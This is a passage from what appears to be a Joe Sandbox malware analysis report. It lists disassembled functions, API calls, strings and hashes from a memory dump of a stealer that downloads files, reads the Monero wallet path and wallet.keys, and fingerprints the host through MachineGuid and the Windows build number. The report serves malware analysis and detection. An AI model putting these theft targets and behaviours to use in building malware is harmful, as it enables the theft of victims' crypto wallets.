Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: f056b10b11b7c129894f097cb2f6fe09b5d8357953f7fc1ac7676d1a47622e49
Instruction ID: 6834654402f0e1d8e4c4f30fc7104a8bd66d75f86f188a69772ae610fe991c42
Opcode Fuzzy Hash: f056b10b11b7c129894f097cb2f6fe09b5d8357953f7fc1ac7676d1a47622e49
Instruction Fuzzy Hash: 354130B1900128ABDF30EF20DD49BDA7BB9EF44305F1040B6BB09B61A1DA749E95CF58

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: 3b26452c7c967e44e77c8842590e3e6a6a3975192444b403a9fc834118110bb2
Instruction ID: 64cfdf245cf6c1963ec8bf4fafdc8c9ae739533deb5469fd7b5dd59ff527bc25
Opcode Fuzzy Hash: 3b26452c7c967e44e77c8842590e3e6a6a3975192444b403a9fc834118110bb2
Instruction Fuzzy Hash: 895194B1D0022C9FDB309F54DC85BDDB7B9EB44308F0000FAA609B7692D6796E898F59

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Strings

V@, xrefs: 00408042

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: V@
API String ID: 2311089104-383300688
Opcode ID: d186ad0854da7cf9e88764127b8522f719d3b98285a1a120d545c3fd45e96e87
Instruction ID: a960ee552f925aeb4cd1d96186a7c3501bb824973d8262ed42b673293e500aa1
Opcode Fuzzy Hash: d186ad0854da7cf9e88764127b8522f719d3b98285a1a120d545c3fd45e96e87
Instruction Fuzzy Hash: CF115B70900204EFDF21DFA4DE88EAF7BB9EB94741F200169F481B62D0DB759A85DB11

Function 00401AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 129stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416DF0: CreateThread.KERNEL32(00000000,00000000,00416D1F,?,00000000,00000000), ref: 00416E8F
Part of subcall function 00416DF0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E97

Strings

.keys, xrefs: 00401B0D
\Monero\wallet.keys, xrefs: 00401B2F

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$File$AllocCreateHeaplstrlen$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 3529164666-3586502688
Opcode ID: 1ab0d0a5402f336f99c3222ca985a06e32bb477bac922e6b9380e2b068e67f0e
Instruction ID: a25c01f705519460f85de4a1bdbe13424c55938c94775980d5863b9513c9e413
Opcode Fuzzy Hash: 1ab0d0a5402f336f99c3222ca985a06e32bb477bac922e6b9380e2b068e67f0e
Instruction Fuzzy Hash: B5512EB1E4012D9BCB21FB25DD466DD7379AF04308F4054BAB608B7191DA78AFC98F98

Function 00415D4F Relevance: 10.6, APIs: 7, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415DDE

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00415DFB
lstrcatA.KERNEL32(?,?), ref: 00415E1A
lstrcatA.KERNEL32(?,?), ref: 00415E2E
lstrcatA.KERNEL32(?), ref: 00415E41
lstrcatA.KERNEL32(?,?), ref: 00415E55
lstrcatA.KERNEL32(?), ref: 00415E68

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00415A63: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415A88
Part of subcall function 00415A63: HeapAlloc.KERNEL32(00000000), ref: 00415A8F
Part of subcall function 00415A63: wsprintfA.USER32 ref: 00415AA8
Part of subcall function 00415A63: FindFirstFileA.KERNEL32(?,?), ref: 00415ABF
Part of subcall function 00415A63: StrCmpCA.SHLWAPI(?,00436A8C), ref: 00415AE0
Part of subcall function 00415A63: StrCmpCA.SHLWAPI(?,00436A90), ref: 00415AFA
Part of subcall function 00415A63: wsprintfA.USER32 ref: 00415B21

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID:
API String ID: 1968765330-0
Opcode ID: 99c2794c65b6df4588c2ba52ba454b75ce94986fb7a92ce24e743c2223d69d8a
Instruction ID: 3f74259e6db276d85a2888b08ae2c31518234e4c8577b210c02d6db6ea6931af
Opcode Fuzzy Hash: 99c2794c65b6df4588c2ba52ba454b75ce94986fb7a92ce24e743c2223d69d8a
Instruction Fuzzy Hash: 2D51DBB1E0011C9BCB64DB75DC85ADDB7B9AB4C315F4044EAF609E3250EB34AB898F58

Function 004155C7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004155FC
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 0041561C
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 00415642
lstrcatA.KERNEL32(?,?), ref: 0041567D
lstrcatA.KERNEL32(?), ref: 00415690

Strings

wyA, xrefs: 00415756

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValue_memset
String ID: wyA
API String ID: 3357907479-1373181054
Opcode ID: 4ac09f0d856b75c887d5aafb031e2cd888774a7d5ea54244769ffe5236b0cdde
Instruction ID: e59678081a770f80ed8799f0e40017e495820343da6e84c06e2d4c810ff5f0e9
Opcode Fuzzy Hash: 4ac09f0d856b75c887d5aafb031e2cd888774a7d5ea54244769ffe5236b0cdde
Instruction Fuzzy Hash: D941B0B184021D9FDB24EF61EC86AE8777AFF58309F0400AAB509A31E1DE749EC59F54

Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
CharToOemA.USER32(?,?), ref: 0041166B

Strings

MachineGuid, xrefs: 00411640
SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2355623204-1211650757
Opcode ID: 5b8d5796c91739723fa3ba097e475cc1ce1be1039e6f4cfdbcc8b552c32c0d87
Instruction ID: f118c0f01aaa32a32995a91dbe2a5b6902d3ea487d3a672b9766c20f8825615b
Opcode Fuzzy Hash: 5b8d5796c91739723fa3ba097e475cc1ce1be1039e6f4cfdbcc8b552c32c0d87
Instruction Fuzzy Hash: 171125B590031DAFDB20DF50DD89FEAB7BDEB14305F0041E5A655D2052D6749E888F14

Function 00410B30 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413DED,Windows: ,00436894), ref: 00410B44
HeapAlloc.KERNEL32(00000000,?,?,?,00413DED,Windows: ,00436894), ref: 00410B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,|hC,?,?,?,00413DED,Windows: ,00436894), ref: 00410B79
RegQueryValueExA.KERNEL32(|hC,00000000,00000000,00000000,000000FF,?,?,?,00413DED,Windows: ,00436894), ref: 00410B95

Strings

Windows 11, xrefs: 00410B5C
|hC, xrefs: 00410B63, 00410B9B, 00410B92, 00410B66

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11$|hC
API String ID: 3676486918-18141544
Opcode ID: 789099dc321a4315fc70ea4aba73a1d7d816f17125449a4b5dc311f82d26dcdd
Instruction ID: f353d66d9df273b3372e4d35089c9e5f372636516d731c97785f8e7fb92596b0
Opcode Fuzzy Hash: 789099dc321a4315fc70ea4aba73a1d7d816f17125449a4b5dc311f82d26dcdd
Instruction Fuzzy Hash: 64F04FB5600308FBEB209B91ED4AFAA7A6AEB44706F141065F601961E0D7B5A9C09B25

Function 00410BA9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413DED,Windows: ,00436894), ref: 00410BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413DED,Windows: ,00436894), ref: 00410BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,|hC,?,?,?,00410C1B,00410B58,?,?,?,00413DED,Windows: ,00436894), ref: 00410BE2
RegQueryValueExA.KERNEL32(|hC,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413DED,Windows: ), ref: 00410BFD

Strings

CurrentBuildNumber, xrefs: 00410BF5
|hC, xrefs: 00410BCC, 00410C03, 00410BFA, 00410BCF

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber$|hC
API String ID: 3676486918-54763189
Opcode ID: 47647b0c785a66ccdc10fe7724b3565b309bb1a936dba315d332c2556fcda0de
Instruction ID: cd1cedbd4c2293696b13f291f5e940ad4ae80b89c091ad72dec8dc053d7340ba
Opcode Fuzzy Hash: 47647b0c785a66ccdc10fe7724b3565b309bb1a936dba315d332c2556fcda0de
Instruction Fuzzy Hash: BAF09075240304BBEB219B90EC0BFAF7A7EEB44702F200014F602A50E0DAB069809A55

Function 00401A51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
wallet_path, xrefs: 00401A9C

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3676486918-4244082812
Opcode ID: def2ee6c342321a5c42a7907e714b670e1ffe3306b7c1e37d98574970cbeba3c
Instruction ID: 796c104ceef1b6b32ea725137b5f95faab1447f7abb0e1dd60dfa187d73cccd6
Opcode Fuzzy Hash: def2ee6c342321a5c42a7907e714b670e1ffe3306b7c1e37d98574970cbeba3c
Instruction Fuzzy Hash: 53F054B5640304BFE7209B90DC0BFAA7A79DB84B15F201065B601B51D0D6F469409A15

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF54,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
